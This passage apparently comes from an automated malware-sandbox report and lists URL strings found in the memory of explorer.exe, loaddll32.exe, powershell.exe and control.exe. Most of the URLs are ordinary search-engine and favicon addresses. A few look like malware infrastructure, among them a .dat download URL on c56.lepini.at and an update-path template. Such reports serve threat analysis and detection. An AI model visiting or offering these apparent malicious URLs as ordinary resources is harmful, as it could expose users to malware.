Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000021.00000002.1158802140.0000000001464000.00000004.00000020.sdmp; String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat6
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.419834945.000000000F559000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000001A.00000003.397786087.000002A59CD6E000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 0000001A.00000002.427201197.000002A5846D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.3.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
